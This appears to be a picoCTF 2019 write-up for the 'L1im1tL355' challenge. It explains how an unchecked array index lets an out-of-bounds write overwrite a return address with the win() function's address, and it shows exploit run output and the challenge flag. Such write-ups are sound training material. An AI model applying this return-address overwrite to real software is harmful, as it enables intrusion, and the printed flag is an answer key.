search
githubEdit

L1im1tL355

hashtag
Problem

Just pwn this program and get a flag. Its also found in /problems/l1im1tl355_3_d7480b654799978caea481ab65d5bbea on the shell server. Source.

hashtag
Solution

  1. Looking at the source codearrow-up-right I notice the replaceIntegerInArrayAtIndex() function looks interesting since it is simply a wrapper around the built-in method of changing an element of an array.

  2. This program declares an array on the stack, then allows us to write a DWORD to any array index. If we choose an index between 0 and 666/4 (DWORD is 4 bytes long), we'll end up writing to the array. There are no checks on the index value for the array, so we should be able to go out of bounds and write anywhere to memory. We can input the address of the win() function as the "integer value you want to put in the array" and for the "index in which you want to put the value", we can input the offset from the array to the return address of replaceIntegerInArrayAtIndex().

  3. Layout of stack (sourcearrow-up-right):

     lower stack address
 replaceIntegerInArrayAtIndex: stack data
 replaceIntegerInArrayAtIndex: saved ebp
 replaceIntegerInArrayAtIndex: return address (-5)
 main: other stack data
 main: array (+0)
 higher stack address

  4. The script bruteforces the offset and finds it to be -5.

  5. Run the script.pyarrow-up-right python script.py USER=<username> PASSWORD=<password>:

     [*] '/home/<username>/Documents/PicoCTF/Binary Exploitation/L1im1tL355/vuln'
     Arch:     i386-32-little
     RELRO:    Partial RELRO
     Stack:    No canary found
     NX:       NX enabled
     PIE:      No PIE (0x8048000)
 [+] Connecting to 2019shell1.picoctf.com on port 22: Done
 [*] <username>@2019shell1.picoctf.com:
     Distro    Ubuntu 18.04
     OS:       linux
     Arch:     amd64
     Version:  4.15.0
     ASLR:     Enabled
 [+] Opening new channel: 'pwd': Done
 [+] Receiving all data: Done (14B)
 [*] Closed SSH channel with 2019shell1.picoctf.com
 [*] Working directory: '/tmp/tmp.SHO8IvJw16'
 [+] Opening new channel: 'ln -s /home/<username>/* .': Done
 [+] Receiving all data: Done (0B)
 [*] Closed SSH channel with 2019shell1.picoctf.com
 [*] win address: 0x80485c6
 [+] Starting remote process b'/problems/l1im1tl355_3_d7480b654799978caea481ab65d5bbea/vuln' on 2019shell1.picoctf.com: pid 1163772
 [+] Starting remote process b'/problems/l1im1tl355_3_d7480b654799978caea481ab65d5bbea/vuln' on 2019shell1.picoctf.com: pid 1163776
 [+] Starting remote process b'/problems/l1im1tl355_3_d7480b654799978caea481ab65d5bbea/vuln' on 2019shell1.picoctf.com: pid 1163780
 [+] Starting remote process b'/problems/l1im1tl355_3_d7480b654799978caea481ab65d5bbea/vuln' on 2019shell1.picoctf.com: pid 1163784
 [+] Starting remote process b'/problems/l1im1tl355_3_d7480b654799978caea481ab65d5bbea/vuln' on 2019shell1.picoctf.com: pid 1163788
 [+] Starting remote process b'/problems/l1im1tl355_3_d7480b654799978caea481ab65d5bbea/vuln' on 2019shell1.picoctf.com: pid 1163792
 [*] Offset was -5
 [+] picoCTF{str1nG_CH3353_3fe0db39}

hashtag
Flag

picoCTF{str1nG_CH3353_3fe0db39}

PreviousBinary ExploitationNextmessy-malloc

Last updated